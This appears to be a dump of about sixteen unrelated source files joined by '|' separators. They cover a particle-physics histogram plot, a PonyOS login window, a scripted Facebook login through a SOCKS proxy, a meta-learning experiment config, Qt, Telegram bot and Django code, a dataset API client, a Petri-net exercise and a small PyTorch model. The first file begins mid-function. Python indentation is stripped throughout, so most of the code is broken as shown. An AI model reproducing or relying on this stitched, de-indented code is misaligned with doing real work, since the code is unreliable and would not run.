pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights,\
label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights,\
label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights,\
label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights,\
label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights,\
label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights,\
label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights,\
label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights+y7_DELTAR_1_weights,\
label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y7_DELTAR_0_weights,\
label="$signal$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"\Delta R [ j_{1} , j_{2} ] ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 40.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights+y7_DELTAR_16_weights).max()*1.1
ymin=0 # linear scale
#ymin=min([x for x in (y7_DELTAR_0_weights+y7_DELTAR_1_weights+y7_DELTAR_2_weights+y7_DELTAR_3_weights+y7_DELTAR_4_weights+y7_DELTAR_5_weights+y7_DELTAR_6_weights+y7_DELTAR_7_weights+y7_DELTAR_8_weights+y7_DELTAR_9_weights+y7_DELTAR_10_weights+y7_DELTAR_11_weights+y7_DELTAR_12_weights+y7_DELTAR_13_weights+y7_DELTAR_14_weights+y7_DELTAR_15_weights+y7_DELTAR_16_weights) if x])/100. # log scale
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonposx="clip")
# Log/Linear scale for Y-axis
plt.gca().set_yscale("linear")
#plt.gca().set_yscale("log",nonposy="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_6.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_6.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_6.eps')
# Running!
if __name__ == '__main__':
selection_6()
|
#!/usr/bin/python3
"""
Login Manager
"""
import math
import os
import sys
import time
import cairo
import yutani
import text_region
import toaru_fonts
import fswait
import panel
from panel import PanelWindow, FillWidget, VolumeWidget, NetworkWidget, DateWidget, ClockWidget, RestartMenuWidget, LabelWidget
from input_box import InputBox
from dialog import DialogWindow
import yutani_mainloop
def rounded_rectangle(ctx,x,y,w,h,r):
degrees = math.pi / 180
ctx.new_sub_path()
ctx.arc(x + w - r, y + r, r, -90 * degrees, 0 * degrees)
ctx.arc(x + w - r, y + h - r, r, 0 * degrees, 90 * degrees)
ctx.arc(x + r, y + h - r, r, 90 * degrees, 180 * degrees)
ctx.arc(x + r, y + r, r, 180 * degrees, 270 * degrees)
ctx.close_path()
class LoginWindow(yutani.Window):
def __init__(self):
w = yutani.yutani_ctx._ptr.contents.display_width
h = yutani.yutani_ctx._ptr.contents.display_height
super(LoginWindow, self).__init__(w, h, doublebuffer=True)
self.move(0,0)
self.set_stack(yutani.WindowStackOrder.ZORDER_BOTTOM)
self.font = toaru_fonts.Font(toaru_fonts.FONT_SANS_SERIF, 11, 0xFFFFFFFF)
self.font.set_shadow((0xFF000000, 2, 1, 1, 3.0))
self.tr = text_region.TextRegion(0,0,200,30,font=self.font)
self.tr.set_text(f"PonyOS {os.uname().release}")
self.load_wallpaper()
def load_wallpaper(self):
tmp = cairo.ImageSurface.create_from_png('/usr/share/wallpapers/default')
self.wallpaper = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.width, self.height)
x = self.width / tmp.get_width()
y = self.height / tmp.get_height()
nh = int(x * tmp.get_height())
nw = int(y * tmp.get_width())
ctx = cairo.Context(self.wallpaper)
if (nw > self.width):
ctx.translate((self.width - nw) / 2, 0)
ctx.scale(y,y)
else:
ctx.translate(0,(self.height - nh) / 2)
ctx.scale(x,x)
ctx.set_source_surface(tmp,0,0)
ctx.paint()
buf = yutani.GraphicsBuffer(self.wallpaper.get_width(),self.wallpaper.get_height())
tmp = buf.get_cairo_surface()
ctx = cairo.Context(tmp)
ctx.set_source_surface(self.wallpaper)
ctx.paint()
yutani.yutani_gfx_lib.blur_context_box(buf._gfx, 20)
yutani.yutani_gfx_lib.blur_context_box(buf._gfx, 20)
yutani.yutani_gfx_lib.blur_context_box(buf._gfx, 20)
ctx = cairo.Context(self.wallpaper)
ctx.set_source_surface(tmp)
ctx.paint()
buf.destroy()
def draw(self):
surface = self.get_cairo_surface()
ctx = cairo.Context(surface)
# Paint blurred wallpaper
ctx.set_source_surface(self.wallpaper)
ctx.paint()
self.tr.move(10,self.height-24)
self.tr.draw(self)
self.flip()
def focus_changed(self, msg):
if msg.focused:
yutani.yutani_ctx.focus_window(prompts.wid)
def finish_resize(self, msg):
"""Accept a resize."""
self.resize_accept(msg.width, msg.height)
self.reinit()
self.load_wallpaper()
self.draw()
self.resize_done()
self.flip()
def keyboard_event(self, msg):
pass
class InputWindow(yutani.Window):
def __init__(self):
_w = yutani.yutani_ctx._ptr.contents.display_width
_h = yutani.yutani_ctx._ptr.contents.display_height
self.logo = cairo.ImageSurface.create_from_png('/usr/share/logo_login.png')
super(InputWindow, self).__init__(272, self.logo.get_height() + 110 + 50, doublebuffer=True)
self.update_position(_w,_h)
self.username = InputBox(placeholder="Username",width=180)
self.password = InputBox(password=True,placeholder="Password",width=180)
self.focused_widget = None
self.username.tab_handler = self.focus_password
self.password.tab_handler = self.focus_username
self.username.submit = self.password_or_go
self.password.submit = self.go
self.error_font = toaru_fonts.Font(toaru_fonts.FONT_SANS_SERIF, 11, 0xFFFF0000)
self.error_font.set_shadow((0xFF000000, 2, 0, 0, 3.0))
self.error_tr = text_region.TextRegion(0,0,self.width,20,font=self.error_font)
self.error_tr.set_alignment(2)
self.error = None
def focus_changed(self, msg):
if not msg.focused:
self.username.focus_leave()
self.password.focus_leave()
def update_position(self, w, h):
self.move(int((w - self.width)/2),int((h - self.height)/2))
def finish_resize(self, msg):
pass # lol no
def draw(self):
surface = self.get_cairo_surface()
ctx = cairo.Context(surface)
# Clear
ctx.set_operator(cairo.OPERATOR_SOURCE)
ctx.rectangle(0,0,self.width,self.height)
ctx.set_source_rgba(0,0,0,0)
ctx.fill()
ctx.set_operator(cairo.OPERATOR_OVER)
ctx.set_source_surface(self.logo, (self.width - self.logo.get_width())/2, 0)
ctx.paint()
base = self.height - 110
rounded_rectangle(ctx, 0, base, self.width, 110, 4)
ctx.set_source_rgba(0,0,0,0.5)
ctx.fill()
if self.error:
self.error_tr.move(0,base+8)
self.error_tr.set_text(self.error)
self.error_tr.draw(self)
ctx.save()
ctx.translate(46,base + 30)
self.username.draw(self,ctx)
ctx.restore()
ctx.save()
ctx.translate(46,base + 60)
self.password.draw(self,ctx)
ctx.restore()
self.flip()
def keyboard_event(self, msg):
if self.focused_widget:
self.focused_widget.keyboard_event(msg)
else:
self.focus_username()
self.focused_widget.keyboard_event(msg)
def focus_password(self):
self.username.focus_leave()
self.password.focus_enter()
self.focused_widget = self.password
self.draw()
def focus_username(self):
self.password.focus_leave()
self.username.focus_enter()
self.focused_widget = self.username
self.draw()
def password_or_go(self):
if self.password.text:
self.go()
else:
self.focus_password()
def go(self):
print(f"USER {self.username.text}")
print(f"PASS {self.password.text}")
print(f"AUTH",flush=True)
response = input()
if response == "FAIL":
self.error = "Incorrect username or password."
self.username.update_text("")
self.password.update_text("")
self.username.reset_cursor()
self.password.reset_cursor()
self.focus_username()
self.draw()
elif response == "SUCC":
sys.exit(0)
def mouse_event(self, msg):
if self.username.mouse_event(msg):
self.focus_username()
elif self.password.mouse_event(msg):
self.focus_password()
elif msg.command == yutani.MouseEvent.DOWN:
self.password.focus_leave()
self.username.focus_leave()
self.focused_widget = None
def maybe_animate():
tick = int(time.time())
if tick != panel.current_time:
try:
os.waitpid(-1,os.WNOHANG)
except ChildProcessError:
pass
panel.current_time = tick
panel_window.draw()
if __name__ == '__main__':
if os.getuid() != 0:
print("This is the GUI login client. You should not be running this. It is run by the GUI session manager.")
sys.exit(1)
print("Hello",flush=True)
yutani.Yutani()
d = yutani.Decor() # Just in case.
panel.current_time = int(time.time())
window = LoginWindow()
window.draw()
prompts = InputWindow()
prompts.draw()
def restart_callback():
def confirm():
print(f"RESTART",flush=True)
sys.exit(0)
DialogWindow(d,"Restart","Are you sure you want to restart?",callback=confirm,icon='exit')
restart = RestartMenuWidget()
restart.callback = restart_callback
widgets = [LabelWidget(os.uname().nodename), FillWidget(),VolumeWidget(),NetworkWidget(),DateWidget(),ClockWidget(),restart]
panel_window = PanelWindow(widgets)
panel_window.draw()
fds = [yutani.yutani_ctx]
while 1:
# Poll for events.
fd = fswait.fswait(fds,500)
maybe_animate()
if fd == 0:
while yutani.yutani_ctx.query():
msg = yutani.yutani_ctx.poll()
if msg.type == yutani.Message.MSG_WELCOME:
panel_window.resize(msg.display_width, panel_window.height)
window.resize(msg.display_width, msg.display_height)
prompts.update_position(msg.display_width, msg.display_height)
else:
if not yutani_mainloop.handle_event(msg):
sys.exit(0)
|
import requests
from selenium import webdriver
from bs4 import BeautifulSoup
session = requests.Session()
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/58.0.3029.110 Safari/537.36'
}
proxies = {
'http': 'socks5://127.0.0.1:1086',
'https': 'socks5://127.0.0.1:1086'
}
def get_args(html):
soup = BeautifulSoup(html, 'html.parser')
first_form = soup.find(attrs={'id': 'login_form'})
lsd = first_form.find(attrs={'name': 'lsd'}).get('value', '')
lgndim = first_form.find(attrs={'name': 'lgndim'}).get('value', '')
lgnrnd = first_form.find(attrs={'name': 'lgnrnd'}).get('value', '')
lgnjs = first_form.find(attrs={'name': 'lgnjs'}).get('value', '')
timezone = first_form.find(attrs={'name': 'timezone'}).get('value')
locale = 'zh_CN'
login_source = 'login_bluebar'
return dict(
lsd=lsd,
lgndim=lgndim,
lgnjs=lgnjs,
lgnrnd=lgnrnd,
timezone=timezone,
locale=locale,
login_source=login_source,
)
def pre_login(url):
resp = session.get(url, headers=headers)
if resp.status_code != 200:
raise Exception('login page request error')
return resp.text
def login(name, passwd, url, data):
data.update({'email': name, 'pass': passwd})
session.post(url, data, headers)
if __name__ == '__main__':
login_name = input('input your account\n')
login_pass = input('input your password\n')
first_url = 'https://www.facebook.com/'
page_source = pre_login(first_url)
post_url = 'https://www.facebook.com/login.php?login_attempt=1&lwv=111'
args = get_args(page_source)
login(login_name, login_pass, post_url, args)
check_url = 'https://www.facebook.com/profile.php?id=100017638279480&hc_ref=NEWSFEED&fref=nf'
resp = session.get(url=check_url, headers=headers)
print(resp.text)
|
from sandbox.rocky.tf.algos.maml_il import MAMLIL
from rllab.baselines.linear_feature_baseline import LinearFeatureBaseline
from rllab.baselines.gaussian_mlp_baseline import GaussianMLPBaseline
from rllab.baselines.maml_gaussian_mlp_baseline import MAMLGaussianMLPBaseline
from rllab.baselines.zero_baseline import ZeroBaseline
from rllab.envs.normalized_env import normalize
from rllab.misc.instrument import stub, run_experiment_lite
from sandbox.rocky.tf.policies.maml_minimal_gauss_mlp_policy import MAMLGaussianMLPPolicy
from sandbox.rocky.tf.optimizers.quad_dist_expert_optimizer import QuadDistExpertOptimizer
from sandbox.rocky.tf.optimizers.first_order_optimizer import FirstOrderOptimizer
#from rllab.envs.mujoco.ant_env_dense import AntEnvRandGoalRing
from rllab.envs.mujoco.ant_env_sparse import AntEnvRandGoalRing
from sandbox.rocky.tf.envs.base import TfEnv
# import lasagne.nonlinearities as NL
import sandbox.rocky.tf.core.layers as L
from rllab.envs.gym_env import GymEnv
#from maml_examples.reacher_env import ReacherEnv
#from rllab.envs.mujoco.pusher_env import PusherEnv
from maml_examples.maml_experiment_vars import MOD_FUNC
import numpy as np
import random as rd
#from examples.trpo_push_obj import
EXPERT_TRAJ_LOCATION_DICT = '/root/code/rllab/saved_expert_traj/Expert_trajs_dense_ant/'
#EXPERT_TRAJ_LOCATION_DICT = '/home/russellm/iclr18/maml_gps/saved_expert_traj/Expert_trajs_dense_ant/'
import tensorflow as tf
import time
beta_steps = 1
adam_steps_list = [50]
updateMode = 'vec'
adam_curve = None
fast_learning_rates = [1.0]
env_option = ''
# mode = "ec2"
mode = 'ec2'
extra_input = "onehot_exploration" # "onehot_exploration" "gaussian_exploration"
# extra_input = None
extra_input_dim = 5
fast_batch_size_list = [20] # 20 # 10 works for [0.1, 0.2], 20 doesn't improve much for [0,0.2] #inner grad update size
meta_batch_size_list = [40] # 40 @ 10 also works, but much less stable, 20 is fairly stable, 40 is more stable
max_path_length = 200 # 100
num_grad_updates = 1
meta_step_size = 0.01
pre_std_modifier = 1.0
post_std_modifier_train = 0.00001
post_std_modifier_test = 0.00001
l2loss_std_mult = 1.0
ism = ''
#importance_sampling_modifier_list = [''] #'', 'clip0.5_'
limit_demos_num = 40 # 40
test_goals_mult = 1
bas_lr = 0.01 # baseline learning rate
momentum=0.5
bas_hnl = tf.nn.relu
hidden_layers = (100,100)
basas = 60 # baseline adam steps
use_corr_term = True
# seeds = [1,2,3,4,5,6,7] #,2,3,4,5,6,7,8] #, 2,3,4,5,6,7,8]
seeds = [1] #,2,3,4,5,6,7,8] #, 2,3,4,5,6,7,8]
use_maml = True
test_on_training_goals = False
for seed in seeds:
for fast_batch_size in fast_batch_size_list:
for meta_batch_size in meta_batch_size_list:
for fast_learning_rate in fast_learning_rates:
for adam_steps in adam_steps_list:
stub(globals())
tf.set_random_seed(seed)
np.random.seed(seed)
rd.seed(seed)
env = TfEnv(normalize(AntEnvRandGoalRing()))
policy = MAMLGaussianMLPPolicy(
name="policy",
env_spec=env.spec,
grad_step_size=fast_learning_rate,
hidden_nonlinearity=tf.nn.relu,
hidden_sizes=(100, 100),
std_modifier=pre_std_modifier,
# metalearn_baseline=(bas == "MAMLGaussianMLP"),
extra_input_dim=(0 if extra_input is None else extra_input_dim),
updateMode = updateMode,
num_tasks = meta_batch_size
)
baseline = LinearFeatureBaseline(env_spec=env.spec)
algo = MAMLIL(
env=env,
policy=policy,
#policy=None,
#oad_policy='/home/alvin/maml_rl/data/local/R7-IL-0918/R7_IL_200_40_1_1_dem40_ei5_as50_basl_1809_04_27/itr_24.pkl',
baseline=baseline,
batch_size=fast_batch_size, # number of trajs for alpha grad update
max_path_length=max_path_length,
meta_batch_size=meta_batch_size, # number of tasks sampled for beta grad update
num_grad_updates=num_grad_updates, # number of alpha grad updates
n_itr=200, #100
make_video=False,
use_maml=use_maml,
use_pooled_goals=True,
use_corr_term=use_corr_term,
test_on_training_goals=test_on_training_goals,
metalearn_baseline=False,
# metalearn_baseline=False,
limit_demos_num=limit_demos_num,
test_goals_mult=test_goals_mult,
step_size=meta_step_size,
plot=False,
beta_steps=beta_steps,
adam_curve=adam_curve,
adam_steps=adam_steps,
pre_std_modifier=pre_std_modifier,
l2loss_std_mult=l2loss_std_mult,
importance_sampling_modifier=MOD_FUNC[ism],
post_std_modifier_train=post_std_modifier_train,
post_std_modifier_test=post_std_modifier_test,
expert_trajs_dir=EXPERT_TRAJ_LOCATION_DICT,
#[env_option+"."+mode+goals_suffix],
expert_trajs_suffix="",
seed=seed,
extra_input=extra_input,
extra_input_dim=(0 if extra_input is None else extra_input_dim),
updateMode = updateMode
)
run_experiment_lite(
algo.train(),
n_parallel=10,
snapshot_mode="all",
python_command='python3',
seed=seed,
exp_name='sparse_parallelSampling_c48',
exp_prefix='Maml_il_ant',
plot=False,
sync_s3_pkl=True,
mode=mode,
terminate_machine=True,
)
|
"""
Zinc Material Chooser Widget
Widget for chooses a material from a material module, derived from QComboBox
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
try:
from PySide import QtCore, QtGui
except ImportError:
from PyQt4 import QtCore, QtGui
from opencmiss.zinc.material import Material
from opencmiss.zinc.status import OK as ZINC_OK
class MaterialChooserWidget(QtGui.QComboBox):
def __init__(self, parent=None):
'''
Call the super class init functions
'''
QtGui.QComboBox.__init__(self, parent)
self._nullObjectName = None
self._materialmodule = None
self._material = None
def _buildMaterialList(self):
'''
Rebuilds the list of items in the ComboBox from the material module
'''
self.blockSignals(True)
self.clear()
if self._materialmodule:
if self._nullObjectName:
self.addItem(self._nullObjectName)
materialiter = self._materialmodule.createMaterialiterator()
material = materialiter.next()
while material.isValid():
name = material.getName()
self.addItem(name)
material = materialiter.next()
self.blockSignals(False)
self._displayMaterial()
def _displayMaterial(self):
'''
Display the currently chosen material in the ComboBox
'''
self.blockSignals(True)
if self._material:
materialName = self._material.getName()
# following doesn't handle material name matching _nullObjectName
index = self.findText(materialName)
else:
index = 0
self.setCurrentIndex(index)
self.blockSignals(False)
def setNullObjectName(self, nullObjectName):
'''
Enable a null object option with the supplied name e.g. '-' or '<select>'
Default is None
'''
self._nullObjectName = nullObjectName
def setMaterialmodule(self, materialmodule):
'''
Sets the region that this widget chooses materials from
'''
self._materialmodule = materialmodule
self._buildMaterialList()
def getMaterial(self):
'''
Must call this from currentIndexChanged() slot to get/update current material
'''
materialName = str(self.currentText())
if self._nullObjectName and (materialName == self._nullObjectName):
self._material = None
else:
self._material = self._materialmodule.findMaterialByName(materialName)
return self._material
def setMaterial(self, material):
'''
Set the currently selected material
'''
if not material or not material.isValid():
self._material = None
else:
self._material = material
self._displayMaterial()
|
from .base_controller import BaseController
from telebot import TeleBot
from telebot.types import InlineKeyboardButton
from repositories.callback_types import NoneCallback
class NoneController(BaseController):
def callback_name(self) -> str:
return self.callback_name
def get_menu_btn(self) -> InlineKeyboardButton:
pass
def __init__(self, bot: TeleBot):
self._bot = bot
self.none_callback = NoneCallback()
self.callback_name = self.none_callback.text
@bot.callback_query_handler(func=lambda call: call.data.find(self.callback_name) != -1)
def _none_callback(call) -> None:
self.none_callback.func()
|
from django.contrib import admin
from userapp import models
admin.site.site_header = u"欢迎来到逸鹏说道"
admin.site.site_title = u"逸鹏说道后台"
# Register your models here.
admin.site.register(models.Express)
admin.site.register(models.ExpressOrder)
# 文件上传
class FileInfoAdmin(admin.ModelAdmin):
list_display = ["file_md5", "createtime", "updatetime", "datastatus"]
readonly_fields = ["file_md5"]
admin.site.register(models.FileInfo, FileInfoAdmin)
# 买家订单
class OrderAdmin(admin.ModelAdmin):
list_display = ["order_id", "createtime", "updatetime", "datastatus"]
readonly_fields = ["order_id", "datastatus"]
admin.site.register(models.Order, OrderAdmin)
|
import requests
class API(object):
"""
A dataset on the HMD instance
"""
def __init__(self, api_token, service_url="http://api.himydata.com/v1/dataset"):
self.service_url = service_url
self.api_token = api_token
def get(self, name, data=None):
"""
Method calls the dataset Api, get the contents of the dataset.
Response is paginated.
:param name:
:param data:
:return: http response
"""
url = self.service_url + ("/%s/" % name)
response = requests.get(url, data=data, headers=self.__get_default_headers())
return response
def insert(self, name, data=None):
"""
Method calls the dataset Api used to insert a row in the dataset.
:param name:
:param data:
:return: http response
"""
url = self.service_url + ("/%s/" % name)
response = requests.put(url, data=data, headers=self.__get_default_headers())
return response
def update(self, name, data):
"""
Method calls the dataset Api used to update a row in the dataset.
:param name:
:param data:
:return: http response
"""
url = self.service_url + ("/%s/" % name)
response = requests.post(url, data=data, headers=self.__get_default_headers())
return response
# todo opn back
# def datasetSchema(self, name, data=None):
# '''
# :type name : name of the dataset
# :rtype json
# '''
# url = self.service_url + ("/%s/"% name)
# response = requests.get(url, data=data, headers=self._getDefaultHeaders())
# return response
def get_config(self, name):
"""
Method returns the config to connect to the database where the dataset is stored.
The config is in a format specific for SqlAlchemy engine
:param name:
:return: json type
"""
url = self.service_url + ("/%s/checkConfig/" % name)
response = requests.get(url, headers=self.__get_default_headers())
if response.status_code != 200:
raise Exception("HTTP Exception {} : {}".format(response.status_code, response.text))
return response.json()
def status(self, name, data=None):
"""
Method returns the status of the dataset
:param name: name of the dataset
:param data:
:return: str
"""
url = self.service_url + ("/%s/status/" % name)
response = requests.post(url, data=data, headers=self.__get_default_headers())
return response
def logs(self, name, data=None):
"""
Method returns logs for the dataset
:param name: name of the dataset
:param data:
:return: str
"""
url = self.service_url + ("/%s/debug/" % name)
response = requests.post(url, data=data, headers=self.__get_default_headers())
return response
def __get_default_headers(self):
"""
:return: json type
"""
return {
"accept": "application/json",
"authorization": "Token " + self.api_token
}
|
# This file was automatically created by FeynRules 2.3.35
# Mathematica version: 12.1.0 for Linux x86 (64-bit) (March 18, 2020)
# Date: Tue 18 Aug 2020 11:58:04
from object_library import all_couplings, Coupling
from function_library import complexconjugate, re, im, csc, sec, acsc, asec, cot
|
from .data import Document
|
import Petrinet
#This mode is for reacheable marking
def Item4():
free = int(input("Input the token in free state: "))
wait = int(input("Input the token in wait state: "))
busy = int(input("Input the token in busy state: "))
inside = int(input("Input the token in inside state: "))
docu = int(input("Input the token in docu state: "))
done = int(input("Input the token in done state: "))
M0 = [wait,free,inside,busy,done,docu]
#Place marking
ps = [Petrinet.Place(m) for m in M0]
ts = dict(
start = Petrinet.Transition(
[Petrinet.In(ps[0]),Petrinet.In(ps[1])],[Petrinet.Out(ps[2]),Petrinet.Out(ps[3])]
),
change = Petrinet.Transition(
[Petrinet.In(ps[2]),Petrinet.In(ps[3])],[Petrinet.Out(ps[4]),Petrinet.Out(ps[5])]
),
end = Petrinet.Transition(
[Petrinet.In(ps[5])],[Petrinet.Out(ps[1])]
),
)
print("The reachable marking from M0 are: ")
network = Petrinet.PetriNet(ts)
network.run_3(ps,ts)
|
def py2and3_test(**kwargs):
original_name = kwargs.pop("name")
kwargs["main"] = original_name + ".py"
py2_name = original_name + "_py2"
py3_name = original_name + "_py3"
native.py_test(
name = py2_name,
python_version = "PY2",
**kwargs
)
native.py_test(
name = py3_name,
python_version = "PY3",
**kwargs
)
native.test_suite(
name = original_name,
tests = [py2_name, py3_name],
)
|
# Generated by Django 3.2.4 on 2021-06-18 02:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('systems', '0011_auto_20210617_2159'),
]
operations = [
migrations.RemoveField(
model_name='managedsystem',
name='details',
),
migrations.RemoveField(
model_name='systemscan',
name='ports',
),
migrations.RemoveField(
model_name='systemscan',
name='sys_name',
),
migrations.AddField(
model_name='managedsystem',
name='sys_scans',
field=models.ManyToManyField(blank=True, to='systems.SystemScan'),
),
migrations.AddField(
model_name='systemscan',
name='errors',
field=models.TextField(default=''),
),
migrations.AddField(
model_name='systemscan',
name='open_ports',
field=models.JSONField(default=dict),
),
migrations.AddField(
model_name='systemscan',
name='ports_to_scan',
field=models.CharField(blank=True, default='22-80', max_length=20),
),
migrations.AddField(
model_name='systemscan',
name='system',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='systems.managedsystem'),
),
migrations.DeleteModel(
name='SystemPorts',
),
]
|
list = ['table','chair','sofa','couch']
list.remove('table')
print(list)
|
import torch
from .. import model
import src
class Tier_1600(model.BaseModel):
def make_layers(self, D):
return [
src.modules.Reshape(1, D),
torch.nn.Conv1d(1, 4, 3, padding=1, stride=2),
src.modules.Transpose(1, 2),
src.modules.PrototypeClassifier(4, 16),
src.modules.polynomial.Activation(16, n_degree=4),
torch.nn.Linear(16, 1),
src.modules.Transpose(1, 2),
torch.nn.Conv1d(1, 4, 3, padding=1, stride=2),
src.modules.Transpose(1, 2),
src.modules.PrototypeClassifier(4, 16),
src.modules.polynomial.Activation(16, n_degree=4),
torch.nn.Linear(16, 1),
src.modules.Reshape(D//2//2),
torch.nn.Linear(D//2//2, 16),
src.modules.PrototypeClassifier(16, 16),
src.modules.polynomial.Activation(16, n_degree=4),
torch.nn.Linear(16, 1)
]
|
"""
Removes stop words produced from the script SemanticParser.py when deriving the method call dependency graph.
ex. python remove_stop_words.py [input].csv [output].csv
"""
import csv
import sys
ebc_stop_words = ['com', 'ibm', 'elastic', 'build', 'cloud', 'api', 'core', 'external', 'system', 'bundle', 'feature', 'instance', 'ucd', 'jenkins', \
'logstash', 'openstack', 'rtc', 'resource', 'runtime', 'staticpool', 'unittest', 'util', 'web']
def removeStopWords(csvFileName, csvClassName):
class_name_file = open(csvClassName)
csv_reader = csv.reader(class_name_file)
class_name_list = []
for name in csv_reader:
class_name_list.append(name[0])
print(class_name_list)
csv_file = open(csvFileName)
csv_reader = csv.reader(csv_file, delimiter=',')
new_list = []
for line in csv_reader:
first_class = line[0].split(".")
second_class = line[1].split(".")
first_name = None
second_name = None
# Change the message name
if first_class[len(first_class)-1] == 'Messages':
if 'external' in first_class:
first_name = 'Messages[Duplicate_#001]'
elif 'api' in first_class:
first_name = 'Messages[Duplicate_#002]'
elif 'jenkins' in first_class:
first_name = 'Messages[Duplicate_#003]'
elif 'rtc' in first_class:
first_name = 'Messages[Duplicate_#004]'
elif 'util' in first_class:
first_name = 'Messages[Duplicate_#005]'
elif 'instance' in first_class:
first_name = 'Messages[Duplicate_#006]'
elif 'core' in first_class:
first_name = 'Messages[Duplicate_#007]'
elif 'openstack' in first_class:
first_name = 'Messages[Duplicate_#008]'
if second_class[len(second_class)-1] == 'Messages':
if 'external' in second_class:
second_name = 'Messages[Duplicate_#001]'
elif 'api' in second_class:
second_name = 'Messages[Duplicate_#002]'
elif 'jenkins' in second_class:
second_name = 'Messages[Duplicate_#003]'
elif 'rtc' in second_class:
second_name = 'Messages[Duplicate_#004]'
elif 'util' in second_class:
second_name = 'Messages[Duplicate_#005]'
elif 'instance' in second_class:
second_name = 'Messages[Duplicate_#006]'
elif 'core' in second_class:
second_name = 'Messages[Duplicate_#007]'
elif 'openstack' in second_class:
second_name = 'Messages[Duplicate_#008]'
if first_class[len(first_class)-1] in class_name_list and second_class[len(second_class)-1] in class_name_list:
if first_name is None:
first_name = first_class[len(first_class) - 1]
if second_name is None:
second_name = second_class[len(second_class) - 1]
if first_name is not None and second_name is not None:
new_list.append([first_name, second_name, line[2]])
return new_list
def writeCSV(reducedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(reducedList)
if __name__ == "__main__":
csvFileName = sys.argv[1]
outputFileName = sys.argv[2]
csvClassName = sys.argv[3]
list_of_ebc_classes = removeStopWords(csvFileName, csvClassName)
writeCSV(list_of_ebc_classes, outputFileName)
|
import pandas as pd
import numpy as np
from webull import paper_webull
# from webull import webull
from datetime import datetime
import time
import sched
